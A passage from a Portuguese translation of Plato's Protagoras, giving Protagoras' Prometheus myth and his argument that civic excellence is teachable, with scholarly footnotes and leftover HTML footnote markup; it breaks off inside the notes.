diferentes alimentos para diferentes seres; a alguns [ele deu] erva da terra; a outros, frutas das árvores; a outros, raízes. E há aqueles a quem ele deu a carne de outros animais como alimento. E a alguns ele atribuiu uma baixa taxa de natalidade, mas atribuiu uma alta taxa de natalidade àqueles que eram capturados por eles, proporcionando segurança ao gênero [dos animais consumidos como presa]supa id=&#34;fnr.3&#34; class=&#34;footref&#34; href=&#34;#fn.3&#34; name=&#34;fnr.3&#34;3/a/sup.&#xA;&#xA;E assim, na medida em que não era absolutamente sábio, Epimeteu não percebeu que havia esgotado todos os poderes nos [gêneros] desprovidos de razão [321c] e que a raça humana ainda estava desorganizada por ele, ficando sem saber o que fazersupa id=&#34;fnr.4&#34; class=&#34;footref&#34; href=&#34;#fn.4&#34; name=&#34;fnr.4&#34;4/a/sup. E enquanto estava perplexo, Prometeu se aproxima dele para examinar a distribuição, e vê os outros animais [harmoniosamente] em sintonia em todos [seus recursos], mas o [animal] humano ele vê nu e descalço e sem cama e sem armas. E já havia chegado o dia determinado em que era necessário que a humanidade também [como os outros animais] saísse da terra para a luz. E Prometeu, sem saber que segurança poderia encontrar para o ser humano, rouba de Hefesto e Atena a sabedoria técnica junto com o fogo—[321d] você vê, sem fogo, essa posse [da sabedoria técnica] era para ele sem aplicação prática [ao invés de se tornar uma posse útil]—e assim ele realmente concede um presente à humanidade. E dessa forma, a humanidade tinha sabedoria sobre os meios de subsistência, mas não tinha sabedoria sobre a arte da polis; você vê, [essa sabedoria] estava na casa de Zeus; e não era mais possível para Prometeu ir à acrópole, à casa de Zeus; e além disso, os guardas de Zeus eram temíveis; [321e] e à casa comum de Atena e Hefesto, onde os dois praticavam carinhosamente suas habilidades técnicas, Prometeu vai secretamente e, depois de roubar a habilidade técnica de Hefesto de usar o fogo e outras habilidades técnicas de Atena, ele as dá à humanidade, e por causa disso [os humanos] têm um meio abundante de subsistência; mas depois, como se diz, uma acusação de furto perseguiu Prometeu [322a] por causa de Epimeteu.&#xA;&#xA;E uma vez que o animal humano tinha uma parte do que foi atribuído aos deusessupa id=&#34;fnr.5&#34; class=&#34;footref&#34; href=&#34;#fn.5&#34; name=&#34;fnr.5&#34;5/a/sup, porque (sozinho entre os animais) ele tinha uma afinidade com o divino, primeiro estabeleceu convenções sobre os deuses e se comprometeu a construir altares e imagens dos deuses; segundo, por meio da habilidade técnica, articulou rapidamente a linguagem e os nomes, e descobriu casas, roupas, sapatos, lençóis e os alimentos da terra. Tendo sido assim providos desde o início, de fato, os humanos viveram espalhados, e não havia poleis. [322b] E assim foram destruídos por feras, pois eram mais fracos de todas as maneiras. E embora sua habilidade técnica artesanal fosse uma ajuda suficiente para a alimentação, ela era insuficiente para a guerra com as feras. Veja, eles ainda não tinham uma habilidade técnica de construção política, da qual a habilidade em guerrear é uma parte. Continuavam buscando, de fato, se reunir e se salvar [por meio] da construção de poleis. E assim, quando conseguiam se reunir, agiam injustamente uns com os outros por não possuírem a habilidade técnica no que diz respeito aos assuntos da polis, de modo que, espalhando-se novamente, eram destruídos. [322c] E assim Zeus, temendo por nossa espécie, para que não fosse destruída completamente, envia Hermes para trazer temor reverencialsupa id=&#34;fnr.6&#34; class=&#34;footref&#34; href=&#34;#fn.6&#34; name=&#34;fnr.6&#34;6/a/sup e um senso do que é legalmente justosupa id=&#34;fnr.7&#34; class=&#34;footref&#34; href=&#34;#fn.7&#34; name=&#34;fnr.7&#34;7/a/sup, de modo que possam haver tanto princípios de ordenação das poleis quanto os laços que promovem a amizadesupa id=&#34;fnr.8&#34; class=&#34;footref&#34; href=&#34;#fn.8&#34; name=&#34;fnr.8&#34;8/a/sup. E assim Hermes pergunta a Zeus de que maneira poderia dar aos humanos um senso do que é legalmente justo e um temor reverencial. “Devo distribuir isso da mesma maneira que as habilidades técnicas foram distribuídas? Elas foram distribuídas assim: uma pessoa que possui habilidade técnica médica é suficiente para muitos leigos, e é o mesmo para os outros artesãos. Devo, de fato, colocar um senso do que é legalmente justo e um temor reverencial nos humanos assim, ou devo distribuí-los a todos?”.&#xA;&#xA;“A todos”, disse Zeus, “e que todos tenham uma parte. [322d] Vocês veem, não haveria pólis se poucos participassem disso, assim como nas outras habilidades técnicas. E considere isso como uma convenção [estabelecida por meu comando] que [é incumbente] matar aquele que não consegue compartilhar do temor reverencial e do senso do que é legalmente justo, [matando-o como] uma praga da pólis”.&#xA;&#xA;Dessa forma, de fato, Sócrates, e por causa dessas coisas, tanto os outros quanto os atenienses, quando há uma discussão sobre a excelência da habilidade técnica de marcenaria ou sobre algum outro ofício, pensam que [apenas] alguns devem ter uma participação no aconselhamento, e se alguém fora desse grupo restrito oferece conselhos, [322e] eles não suportam isso, como você diz—justamente, como eu digo; mas quando vão compartilhar conselhos sobre [a condução] dos assuntos da pólis de forma excelente, [323a] que deve surgir inteiramente de uma prática de justiçasupa id=&#34;fnr.9&#34; class=&#34;footref&#34; href=&#34;#fn.9&#34; name=&#34;fnr.9&#34;9/a/sup e autocontrole, eles de maneira apropriada aceitam [o conselho de] cada homem, como é adequado, claro, pois todos têm uma parte nessa excelência, ou não haveria pólis. Isso, Sócrates, é [o que] é responsável por esse [fenômeno].&#xA;&#xA;E assim, para que você não pense que está sendo enganado [ao aceitar] que todos os seres humanos realmente acreditam que cada homem tem uma parte na prática da justiça e nas demais excelências que envolvem os assuntos da pólis, considere a próxima evidência. Nas outras formas de excelência, como você diz, se alguém afirma que é um bom flautista ou [que é bom] em alguma outra habilidade técnica da qual não é [bom], ou eles riem dele ou dificultam [sua vida], [323b] e seus parentes vêm e o avisam de que ele está louco; mas nas [questões de] prática da justiça e nas demais excelências que dizem respeito aos assuntos da pólis, mesmo que saibam que alguém é injusto, se ele mesmo diz a verdade na frente de muitos [pessoas: que ele é injusto]—o que [na questão de outras formas de excelência] eles consideram como autocontrole—ou seja, dizer a verdade, lá eles consideram isso uma loucura, e afirmam que todas as pessoas precisam dizer que são justas, estejam elas sendo ou não, ou que a pessoa que não faz alarde de praticar a justiça está loucasupa id=&#34;fnr.10&#34; class=&#34;footref&#34; href=&#34;#fn.10&#34; name=&#34;fnr.10&#34;10/a/sup —como se fosse necessário que qualquer um que não tivesse uma participação na [prática da justiça] [323c] não pertencesse à raça humana.&#xA;&#xA;E assim, isso é o que estou dizendo: que [os cidadãos da pólis] adequadamente aceitam cada homem como conselheiro sobre essa excelência porque pensam que todos têm uma parte nela. E isso tentarei mostrar a você a seguir: Eles não pensam que [essa excelência] é por natureza ou que surge automaticamente, mas [pensam] que é ensinável e que surge da atenção que se dedica a ela. Veja, ninguém fica emocional [323d] em relação aos muitos defeitos que os seres humanos acreditam que uns têm dos outros por natureza ou por acaso, nem dá avisos ou instrui ou disciplina aqueles que têm esses [defeitos] com o objetivo de que não sejam assim, mas sentem pena [por eles]. Pois quem é tão insensato a ponto de se empenhar em fazer qualquer uma dessas coisas em relação àqueles que são feios, pequenos ou fracos? Veja, eu acho que eles sabem que essas coisas—beleza e o oposto, [feiura] —surgem nas pessoas por natureza e por acaso. Mas em relação às muitas coisas boas que pensam surgir para os seres humanos por causa da atenção ou da prática ou do ensino, se alguém não tem essas [323e] mas tem os males opostos a essas, [é em relação] a essas pessoas, suponho, que eles [direcionam] suas emoções e punições e avisos. Entre essas [qualidades ruins], uma é a injustiça e a impiedade e, de maneira geral, tudo que é o oposto da excelência que diz respeito aos assuntos da pólissupa id=&#34;fnr.11&#34; class=&#34;footref&#34; href=&#34;#fn.11&#34; name=&#34;fnr.11&#34;11/a/sup. [324a] É aqui que, de fato, cada pessoa direciona sua emoção e adverte cada [outra pessoa]—claramente porque a posse [da excelência] vem da atenção e do aprendizado. Veja, Sócrates, se você está disposto a voltar sua mente para a disciplina, sobre o que isso pode [fazer] por aqueles que agem injustamente, o [assunto] em si lhe ensinará que os seres humanos pensam que a excelência é algo que pode ser fornecido. Veja, ninguém que tenha uma mente disciplina aqueles que agem injustamente por esse [motivo] e por causa disso—[apenas] porque ele agiu injustamente [324b]—[ou seja,] quem não toma vingança irracionalmente como uma besta; e aquele que se propõe a punir com razão não toma vingança por uma injustiça que foi perpetrada—veja, uma coisa [já] feita não pode [ser feita] não ter acontecido—mas por causa do futuro, para que nem [o perpetrador] novamente atue injustamente, nem outro que o veja punido. E tendo isso em mente, ele tem em mente que a excelência é uma questão de educação: ele pune para o fim de desencorajar. E assim todas as pessoas têm essa opinião, [324c] [ou seja,] todos que tomam vingança privada e publicamente. E o restante da humanidade toma vingança e pune aqueles que pensam que agem injustamente, e não menos os atenienses, seus [colegas] cidadãos; de modo que, de acordo com esse argumento, os atenienses também estão entre aqueles que pensam que a excelência é uma coisa que pode ser fornecida e ensinada. E assim foi suficientemente demonstrado a você, Sócrates, [324d] como, é claro, me parece, que seus cidadãos a aceitam de maneira apropriada quando um ferreiro e um sapateiro dão conselhos sobre assuntos pertinentes à pólis—[porque] pensam que a excelência é uma coisa que pode ser fornecida.&#xA;&#xA;Ainda há o restante da sua perplexidade a respeito dos homens bons—por que, de fato, os homens bons ensinam a seus filhos as outras [lições] dos professores e os tornam sábios [nessas coisas], mas nessa excelência particular [dos seres humanos], os homens bons não tornam [seus filhos] melhores do que ninguém [mais]. Sobre isso, de fato, Sócrates, não contarei mais uma história, mas [apresentarei] um argumento. Veja, considere o seguinte:&#xA;&#xA;Há ou não há uma coisa [324e] que é necessária para que todos os cidadãos compartilhem se houver uma pólis? Nesse ponto, você vê, a mesma perplexidade que o perturba é resolvida, ou não será resolvida em nenhum outro lugar. Veja, se, por um ladosupa id=&#34;fnr.12&#34; class=&#34;footref&#34; href=&#34;#fn.12&#34; name=&#34;fnr.12&#34;12/a/sup, existe essa [uma coisa], e essa uma coisa não é a [habilidade] do construtor ou do ferreiro ou do oleiro [325a], mas é a prática da justiça, do autocontrole e da santidade (e estou falando de tudo isso junto como uma só coisa, a excelência de um homem), se há essa [uma coisa] da qual é necessário que todos tenham uma parte (e cada homem, se também deseja aprender ou fazer algo mais, deve agir com essa [uma coisa, a excelência de um homem] e sem isso [ele deve] não [agir])—ou, [se existe essa uma excelência, então é necessário] ensinar e disciplinar aquele que não compartilha disso (uma criança, um homem e uma mulher) até que, sendo disciplinado, [a pessoa] se torne melhor; mas [se acontecer que] mesmo sendo disciplinada e ensinada, a pessoa não obedece [e não se torna melhor], [será necessário] expulsar essa [pessoa], como se incurável, da pólis ou matá-la [325b]—se for dessa forma, e se for naturalmente dessa forma, considere como os homens bons são estranhos, se enquanto ensinam seus filhos outras coisas, não os ensinam isso. Mostramos, você vê, que eles pensam que é uma coisa ensinável tanto privada quanto publicamente. E uma vez que é ensinável e um [assunto] de cuidado, enquanto seus filhos são ensinados as outras coisas para as quais a morte não é a penalidade se não as conhecem, por que a penalidade é a morte e o exílio para seus próprios filhos quando não aprendem e não cuidam da excelência, e [325c] além da morte, a apropriação pública de seus bens e, para ser breve, a completa destruição de seus lares—veja, essas coisas não são ensinadas e não se preocupam [em ensiná-las] com todo o cuidadosupa id=&#34;fnr.13&#34; class=&#34;footref&#34; href=&#34;#fn.13&#34; name=&#34;fnr.13&#34;13/a/sup? É, claro, necessário, Sócrates, pensar [assim].&#xA;&#xA;Começando [desde quando] seus filhos são pequenos, durante toda a vida dos [pais], eles ensinam e aconselham [seus filhos]. Assim que um [filho] entende o que é dito mais rapidamente [do que entendia quando era menor], sua ama, mãe, pedagogosupa id=&#34;fnr.14&#34; class=&#34;footref&#34; href=&#34;#fn.14&#34; name=&#34;fnr.14&#34;14/a/sup e [325d] o próprio pai brigam sobre isso—como o filho pode ser melhor—ensinando e mostrando [a ele] que para cada ato e palavra isso é o que é justo, isso é o que é injusto, e isso aqui é o belo, e isso o feio, e isso aqui o sagrado, e isso o profano, e &#39;faça essas coisas&#39;, mas &#39;não faça essas.&#39; E se ele obedece de bom grado . . . mas se não, como se fosse um pedaço de madeira torta ou curvada, eles o endireitam [com] ameaças e golpes. E depois disso, eles o enviam para as [escolas] dos professores e, com muito mais [força], ordenam [aos professores] que se preocupem muito mais com o comportamento ordeiro de seus filhos do que com sua leitura, escrita e sua execução na lira.&#xA;&#xA;[325e] E os professores se preocupam com essas coisas, e assim que os [crianças] aprendem suas letras e estão prestes a entender o que está escrito tão bem quanto já entendiam a fala articulada, os [professores], por sua vez, oferecem-lhes em suas carteiras os poemas de bons poetas para ler e os obrigam a aprendê-los completamente, [poemas] nos quais há muitos avisos e [326a] muitas histórias detalhadas e canções de louvor e encômios aos bons homens do passado, para que a criança, admirando-os, possa imitá-los e esforçar-se para se tornar como eles.&#xA;&#xA;E os professores de lira, por sua vez, em relação a outros assuntos semelhantes, cuidam da [moderação das crianças] para que os jovens não se comportem mal; além desses assuntos, quando as [crianças] aprenderam a tocar lira, eles lhes ensinam também os poemas de outros bons poetas — poetas líricos — ajustando os [poemas] à execução na lira, [326b] e eles fazem com que os ritmos e harmonias se familiarizem nas almas das crianças, para que [as crianças] se tornem mais gentis, [de modo que], ao se tornarem mais rítmicas e harmoniosas, sejam úteis ao falar e agir. Toda a vida de um ser humano, como você vê, precisa de ritmo e harmoniasupa id=&#34;fnr.15&#34; class=&#34;footref&#34; href=&#34;#fn.15&#34; name=&#34;fnr.15&#34;15/a/sup.&#xA;&#xA;Então, além dessas coisas, eles ainda enviam [as crianças] ao professor de ginástica para que, estando seus corpos em melhor [condição], possam servir ao bom pensamentosupa id=&#34;fnr.16&#34; class=&#34;footref&#34; href=&#34;#fn.16&#34; name=&#34;fnr.16&#34;16/a/sup [326c] e não sejam obrigadas a agir de forma covarde tanto nas guerras quanto em outras ações, por conta da má condição de seus corpos. E aqueles que fazem essas coisas mais são os mais poderosos; e os mais poderosos são os mais ricos; e os filhos desses começam desde a mais tenra idade a ir aos seus professores [e] param [de ir a eles] na idade mais tardia. E quando eles deixam de [ir aos] seus professores, a pólis, por sua vez, os obriga a aprender as convenções e a viver de acordo com elas [326d] como um paradigma, para que não ajam por conta própria ao acaso, mas [os obriga] de uma forma simples: Assim como os professores de escrita riscam o contorno das letras em uma tábua de escrever e dão a tábua àquelas crianças que ainda não são hábeis na escrita e as forçam a [praticar] escrevendo entre as letras delineadas, assim também a pólis, tendo traçado o contorno das convenções — as descobertas dos bons homens do passado que estabeleceram as convenções — obriga [as crianças] a governar e ser governadas de acordo com elas, e aquele que se desvia dessas, [a pólis] castiga. [326e] E o nome para esse castigo entre vocês e em toda parte, já que a pena legal é corretiva, é chamado de &#39;correção&#39;. E assim, já que há tanto cuidado com a excelência, tanto em privado quanto em público, você se admira, Sócrates, e está perplexo sobre se a excelência é ensinável? Mas não é necessário se admirar, seria muito mais [admirável] se ela não fosse ensinável.&#xA;&#xA;E então, por que muitos filhos de bons pais se tornam inconsequentes? Aprenda isso a seguir. Você vê, não é surpreendente se eu estava dizendo a verdade em minhas observações anteriores, que [327a] se houver uma pólis, é necessário que ninguém seja leigo nesse aspecto — a excelência. Você vê, se o que digo é de fato assim — e de todas as coisas isso é o mais verdadeiro — reflita sobre qualquer uma das práticas e coisas a serem aprendidas além da [excelência] e escolha [uma delas]. Se não fosse possível que uma pólis existisse a menos que todos [as pessoas] fossem flautistas — o tipo [de flautista] que cada um poderia ser — cada pessoa [estaria] ensinando cada pessoa [a tocar flauta], tanto privada quanto publicamente, e reprovando qualquer um que não tocasse flauta bem, não se importando [com ninguém] em dar essa [instrução], assim como agora ninguém se importa em [ensinar aos outros] coisas justas e legais e não as esconde como [esconderia] outras questões técnicas; [327b] eu penso, você vê, que a prática da justiça e da excelência [dos indivíduos entre] si nos beneficiasupa id=&#34;fnr.17&#34; class=&#34;footref&#34; href=&#34;#fn.17&#34; name=&#34;fnr.17&#34;17/a/sup; por causa dessas coisas, todos falam ansiosamente uns com os outros e ensinam o que é justo e legal; e assim, se compartilhássemos toda nossa empolgação e altruísmo em ensinar uns aos outros a tocar flauta, você acha, Sócrates,” ele disse, “que os filhos de bons flautistas se tornariam bons flautistas mais do que [os filhos de] flautistas inconsequentes? Eu acho que não, mas qualquer filho, tendo nascido excelente por natureza em música de flauta, poderia se tornar grande e famoso, e qualquer filho que [327c] não tivesse [excelência] natural ficaria sem fama. E muitas vezes [o filho] de um bom flautista acabaria sendo um flautista inconsequente e o [filho de um flautista inconsequente acabaria sendo] um bom. Mas, de qualquer forma, na verdade, todos [esses] flautistas seriam adequados em comparação a leigos que não sabem nada sobre flauta. E dessa forma, pense mesmo agora que qualquer um criado entre convenções e seres humanos que lhe parece ser um ser humano muito injusto [327d] é [no entanto] justo, mesmo um artesão disso, se ele tiver que ser julgado em comparação com seres humanos que não têm educação nem tribunais nem convenções nem qualquer necessidade que continuamente obrigue alguém a cuidar da excelência, mas são selvagens — o tipo [de pessoas] que o poeta Pherecrates colocou no palco no ano passado no [festival] Lenaiansupa id=&#34;fnr.18&#34; class=&#34;footref&#34; href=&#34;#fn.18&#34; name=&#34;fnr.18&#34;18/a/sup.&#xA;&#xA;[Se você se encontrasse] entre tais seres humanos, como os que odeiam os homens em seu coro, você ficaria extremamente feliz se encontrasse Eurybates e Phrynondassupa id=&#34;fnr.19&#34; class=&#34;footref&#34; href=&#34;#fn.19&#34; name=&#34;fnr.19&#34;19/a/sup, [327e] e você choraria alto, desejando a maldade das pessoas aqui. E agora você está amoado, Sócrates, porque todos são professores de excelência, cada um na medida em que pode ser, e ninguém lhe parece ser [um professor disso]; é como isto: Se você estivesse procurando alguém para ser um professor de grego, [328a] ninguém apareceria, nem, de fato, eu penso, se você estivesse buscando alguém para ensinar os filhos dos artesãos a mesma habilidade técnica que, de fato, eles aprenderam com seus pais, na medida em que seu pai e os amigos de seu pai que tinham a mesma habilidade ainda pudessem ensinar [a eles], eu não acho que seria fácil, Sócrates, encontrar um professor dessas [artes], mas para [jovens que eram] totalmente inexperientes, seria fácil [encontrar um professor], e é assim também nas [questões] de excelência e de todas as outras coisas. [328b] Mas se alguém diferir de nós um pouco ao nos levar adiante para a excelência, é algo a ser celebrado. Eu acho que sou um desses e [que eu] beneficio uma pessoa de forma diferente das outras em se tornar um homem bom e digno, e merecidamente faço isso por um pagamento e por um pagamento ainda maior, como parece [certo] para o próprio aprendiz. Por causa dessas coisas, também fiz isso em relação ao pagamento. Você vê, sempre que alguém aprende comigo, se desejar, [ele paga] o valor que eu cobro, mas se ele não [quiser], ele vai a um templo e jura [328c] quanto ele acha que minhas aulas valem, [e] é isso que ele colocasupa id=&#34;fnr.20&#34; class=&#34;footref&#34; href=&#34;#fn.20&#34; name=&#34;fnr.20&#34;20/a/sup. &#xA;&#xA;Para você, Sócrates,” ele disse, “esta é a história e o argumento que eu contei, sobre como a excelência é um [assunto] ensinável e como os atenienses pensam isso e como não é de modo algum surpreendente que os filhos de homens bons se tornem inconsequentes e os filhos de [pais] inconsequentes se tornem bons, uma vez que os filhos de Policleto, que têm a mesma idade que Paralus e Xanthippus aqui, não são nada comparados ao pai deles, e outros [filhos] de outros artesãos são iguais. Mas não é correto acusar esses [rapazes]supa id=&#34;fnr.21&#34; class=&#34;footref&#34; href=&#34;#fn.21&#34; name=&#34;fnr.21&#34;21/a/sup. [328d] Você vê, ainda há esperanças neles; você vê, eles são jovens.&#xA;&#xA;div id=&#34;footnotes&#34;        h3 class=&#34;footnotes&#34;Notas de Rodapé/h3        div id=&#34;text-footnotes&#34;            div class=&#34;footdef&#34;supa id=&#34;fn.1&#34; name=&#34;fn.1&#34; class=&#34;footnum&#34; href=&#34;#fnr.1&#34;1/a/sup p class=&#34;footpara&#34;Os nomes são significativos: Prometeu significa &#34;compreensão antecipada&#34;; Epimeteu significa &#34;compreensão tardia”./p/div            div class=&#34;footdef&#34;supa id=&#34;fn.2&#34; name=&#34;fn.2&#34; class=&#34;footnum&#34; href=&#34;#fnr.2&#34;2/a/sup p class=&#34;footpara&#34;Toda esta frase é obscura. Talvez Protágoras esteja falando sobre as camas ou os locais de dormir dos animais que não têm “um colchão de pelagem.” Aqueles que se escondem sob suas armas seriam animais como os porcos-espinhos, que dormem sob seus espinhos; aqueles que são providos de pele espessa seriam animais como elefantes ou vacas; aqueles que são dotados de partes sem sangue seriam animais como caracóis ou tartarugas. Uma tradução alternativa poderia ser “vestindo alguns com armas, outros com peles espessas e sem sangue.” Esses seriam animais que usam seus pés como armas e como meio de locomoção. Talvez, neste caso, as peles espessas e sem sangue se refiram a cascos./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.3&#34; name=&#34;fn.3&#34; class=&#34;footnum&#34; href=&#34;#fnr.3&#34;3/a/sup p class=&#34;footpara&#34;Heródoto faz praticamente a mesma observação (3.108)./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.4&#34; name=&#34;fn.4&#34; class=&#34;footnum&#34; href=&#34;#fnr.4&#34;4/a/sup p class=&#34;footpara&#34;Ficar sem saber o que fazer se refere aqui ao estado de aporia./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.5&#34; name=&#34;fn.5&#34; class=&#34;footnum&#34; href=&#34;#fnr.5&#34;5/a/sup p class=&#34;footpara&#34;Isso provavelmente se refere à capacidade de raciocinar./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.6&#34; name=&#34;fn.6&#34; class=&#34;footnum&#34; href=&#34;#fnr.6&#34;6/a/sup p class=&#34;footpara&#34;Aidós (Αἰδώς): reverência, temor, respeito pelo sentimento ou opinião dos outros ou pela própria consciência, vergonha, autorrespeito, senso de honra, sobriedade, consideração pelos outros, especialmente os desamparados, compaixão. Na mitologia grega, Aedos ou Aesquine era uma Daemon, a personificação da vergonha, da humildade e do pudor, sendo ao mesmo tempo a divindade que representava o sentimento da dignidade humana, tendo como qualidade o respeito ou a vergonha que reprime aos homens do inapropriado. Sua equivalente romana seria Pudor ou Pudicia. Traduzido como &#34;temor reverencial&#34; pois no texto está em algum lugar entre &#34;reverência&#34;, que parece inspirada pela bondade, e &#34;medo&#34;, que é uma expectativa de dano./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.7&#34; name=&#34;fn.7&#34; class=&#34;footnum&#34; href=&#34;#fnr.7&#34;7/a/sup p class=&#34;footpara&#34;Dike (δίκη): Um termo do direito ático que significa, de forma geral, qualquer procedimento legal de uma parte diretamente ou indiretamente contra outras. O objetivo de todas essas ações é proteger o corpo político, ou um ou mais de seus membros individuais, de lesões e agressões. Esta é a nossa tradução de dike, que, embora às vezes seja traduzida como “justiça”, de forma mais geral significa “processo judicial”, “ação legal” e até mesmo “pena atribuída”, e, portanto, tem uma associação com um processo ou sensibilidade legal. É análoga ao nosso termo “temor reverencial” e combina um senso do que é certo com um medo de sofrer uma penalidade./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.8&#34; name=&#34;fn.8&#34; class=&#34;footnum&#34; href=&#34;#fnr.8&#34;8/a/sup p class=&#34;footpara&#34;Talvez na frase de Protágoras tenhamos uma lista dos componentes do artesanato político. A ordem e a amizade são as bases da vida social. Essas opiniões são muito antigas. Em Heródoto, Deioces é o fundador da realeza porque mantém sua sociedade, a Média, longe da anarquia. Os antigos argumentos sobre o fortalecimento da cidade incluem o aumento do número de laços (desmoi) entre os indivíduos. O principal argumento moral contra o casamento incestuoso é que ele duplica os laços (o mesmo homem pode ser irmão, tio, primo) em vez de multiplicar os laços entre famílias distintas por meio de casamentos fora da própria família (criando parentes por meio do casamento)./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.9&#34; name=&#34;fn.9&#34; class=&#34;footnum&#34; href=&#34;#fnr.9&#34;9/a/sup p class=&#34;footpara&#34;Anteriormente, Protágoras havia associado os termos &#39;senso do que é legalmente justo&#39; com &#39;temor reverencial.&#39; Agora, em vez de &#39;senso do que é legal,&#39; ele está usando dikaiosyne, que traduzimos como &#39;prática de justiça,&#39; embora ela, assim como dike (veja a nota 7), também seja frequentemente traduzida simplesmente como &#39;justiça&#39;./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.10&#34; name=&#34;fn.10&#34; class=&#34;footnum&#34; href=&#34;#fnr.10&#34;10/a/sup p class=&#34;footpara&#34;Esta é uma visão completamente oposta àquela que Sócrates defende no Górgias, onde ele persuade seu interlocutor Pólis de que um homem deve se denunciar e denunciar seus amigos quando eles estiverem errados e deixar seus inimigos em liberdade (Górgias 480b–481b)./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.11&#34; name=&#34;fn.11&#34; class=&#34;footnum&#34; href=&#34;#fnr.11&#34;11/a/sup p class=&#34;footpara&#34;Injustiça e impiedade e, de maneira geral, tudo que é o oposto da excelência que diz respeito aos assuntos da pólis&#39; são entendidos como uma só coisa. Um hendíadis é o recurso pelo qual uma coisa é expressa por duas palavras (por exemplo, &#39;força e vigor&#39;). Há um debate sobre se uma ideia ou várias ideias distintas são pretendidas aqui. Em Platão, há a questão recorrente de se a virtude é uma coisa só e se todas as aparentemente várias virtudes se reduzem a uma única virtude. A linguagem que Platão aqui dá a seu personagem Protágoras parece deliberadamente provocativa, já que Protágoras diz que uma das qualidades ruins consiste em partes, uma delas extremamente grande (&#39;de maneira geral, tudo que é o oposto da excelência que diz respeito aos assuntos da pólis&#39;)./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.12&#34; name=&#34;fn.12&#34; class=&#34;footnum&#34; href=&#34;#fnr.12&#34;12/a/sup p class=&#34;footpara&#34;Platão faz com que Protágoras se esqueça do pensamento que começaria com &#39;por outro lado.&#39; Protágoras nunca retoma as consequências de não haver uma excelência humana básica e se perde em um argumento divagante./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.13&#34; name=&#34;fn.13&#34; class=&#34;footnum&#34; href=&#34;#fnr.13&#34;13/a/sup p class=&#34;footpara&#34;Protágoras está fazendo um argumento a fortiori, argumentando &#39;a partir do que é mais forte.&#39; Por exemplo, se uma pessoa pode levantar cinquenta libras (o que requer maior força), ela certamente pode levantar dez libras. Sem dúvida, este é um dos tipos de argumento que Protágoras ensinou./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.14&#34; name=&#34;fn.14&#34; class=&#34;footnum&#34; href=&#34;#fnr.14&#34;14/a/sup p class=&#34;footpara&#34;Um pedagogo era o escravo que acompanhava um menino à escola e de volta para casa./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.15&#34; name=&#34;fn.15&#34; class=&#34;footnum&#34; href=&#34;#fnr.15&#34;15/a/sup p class=&#34;footpara&#34;Na República, Sócrates discute extensivamente o papel da música na educação dos guardiões. A música, segundo Sócrates, tem o poder de agir diretamente sobre as paixões, até contra e sem a razão. O uso da música, juntamente com a ginástica, serve para refinar a alma adequadamente — tornar a alma mais dura ou mais suave conforme necessário — para preparar os guardiões para o cumprimento de sua responsabilidade política (liderar sua sociedade em tempos de paz e guerra) e, ainda mais, para o cumprimento de sua responsabilidade intelectual (buscar a verdade do ser). Veja, por exemplo, República 410a–412a./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.16&#34; name=&#34;fn.16&#34; class=&#34;footnum&#34; href=&#34;#fnr.16&#34;16/a/sup p class=&#34;footpara&#34;Protágoras parece aqui antecipar o argumento de que corpos saudáveis podem ser usados para o bem ou para o mal. No Górgias, o personagem Górgias diz que a retórica não deve ser acusada se for usada de forma errada, um argumento repetido mais tarde por Isócrates (Antídose 252) e Aristóteles (Retórica 1355b3–7). Aqui, Protágoras afirma que corpos saudáveis são úteis para servir pensamentos saudáveis, e ele não convida a possibilidade de serem úteis para más ações./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.17&#34; name=&#34;fn.17&#34; class=&#34;footnum&#34; href=&#34;#fnr.17&#34;17/a/sup p class=&#34;footpara&#34;Este é o argumento de Sócrates na Apologia (25c–26a), onde ele afirma que nunca intencionalmente prejudicaria outra pessoa porque tornaria a sociedade pior e, portanto, como membro da sociedade, tornaria sua própria vida pior. Todo criminoso, é claro, poderia usar o mesmo argumento. O problema com o argumento surge da suposição de que as pessoas estão sempre agindo racionalmente ou sem erro nos pressupostos./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.18&#34; name=&#34;fn.18&#34; class=&#34;footnum&#34; href=&#34;#fnr.18&#34;18/a/sup p class=&#34;footpara&#34;Em 421–420 a.C.E., o dramaturgo cômico Pherecrates produziu Os Homens Selvagens, que sobrevive em muito poucos fragmentos. Hermann Sauppe sugere que os &#39;homens selvagens&#39; se assemelhavam aos ciclopes de Homero em sua barbaridade. Pouco se sabe sobre Pherecrates, que se diz ter vencido sua primeira competição em 438 e ter composto vinte e uma comédias. O que parece claro é que a peça abordou, em forma cômica, o debate sobre natureza e convenção, mostrando mais uma vez que a comédia, como os diálogos de Platão — e como a nossa comédia contemporânea — se sentia à vontade para zombar de debates intelectuais./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.19&#34; name=&#34;fn.19&#34; class=&#34;footnum&#34; href=&#34;#fnr.19&#34;19/a/sup p class=&#34;footpara&#34;Segundo a Suída, uma compilação do século X d.C. de coleções anteriores de dados, a única fonte de informação sobre esses homens, Eurybatos era um homem perverso que foi enviado por Crésus com dinheiro em uma embaixada e traiu Crésus, indo para Ciro, o inimigo de Crésus. Phrynondas era um indivíduo igualmente perverso./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.20&#34; name=&#34;fn.20&#34; class=&#34;footnum&#34; href=&#34;#fnr.20&#34;20/a/sup p class=&#34;footpara&#34;Aristóteles, na Ética a Nicômaco (1164a25), parece confirmar o método de pagamento de Protágoras, mas é, claro, possível que Aristóteles tenha aprendido isso do diálogo presente. Aristóteles cita Hesíodo como tendo estabelecido a prática. Em Os Trabalhos e os Dias (370), Hesíodo cantou: &#39;Que o salário seja suficiente&#39;./p/div&#x9;div class=&#34;footdef&#34;supa id=&#34;fn.21&#34; name=&#34;fn.21&#34; class=&#34;footnum&#34; 